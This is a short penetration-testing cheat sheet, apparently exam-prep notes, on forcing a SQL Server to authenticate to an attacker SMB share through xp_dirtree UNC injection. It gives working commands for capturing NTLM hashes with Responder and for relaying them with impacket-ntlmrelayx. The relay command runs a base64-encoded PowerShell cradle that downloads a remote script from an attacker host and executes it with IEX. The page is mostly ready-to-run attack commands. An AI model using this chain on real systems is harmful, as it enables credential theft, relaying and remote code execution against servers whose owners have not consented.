UNC Path Injection

Force an SQL server to connect to an SMB share we control, to subsequently grab NTLM hash to crack or use for relaying -> NTLM Relaying

Query to execute on server:

EXEC master..xp_dirtree \"\\\\192.168.119.120\\\\test\";

On Kali:

sudo responder -I tap0

!!!!(RESPONDER IS PROHIBITED DURING OSEP EXAM)!!!!

Example NTLM Relaying with UNC

pwsh
$text = "(New-Object System.Net.WebClient).DownloadString('http://192.168.45.242/run.txt') | IEX"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($text)
$EncodedText = [Convert]::ToBase64String($bytes)
$EncodedText

KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIANAAyAC8AcgB1AG4ALgB0AHgAdAAnACkAIAB8ACAASQBFAFgA

(host powershell runner -> PowerShell Runners)

Start ntlmrelayx (in this case proxychains is used)

sudo proxychains impacket-ntlmrelayx --no-http-server -smb2support -t 172.16.229.152 -c 'powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIANAAyAC8AcgB1AG4ALgB0AHgAdAAnACkAIAB8ACAASQBFAFgA'

Last updated 2 years ago

hashtagExample NTLM Relaying with UNC

Example NTLM Relaying with UNC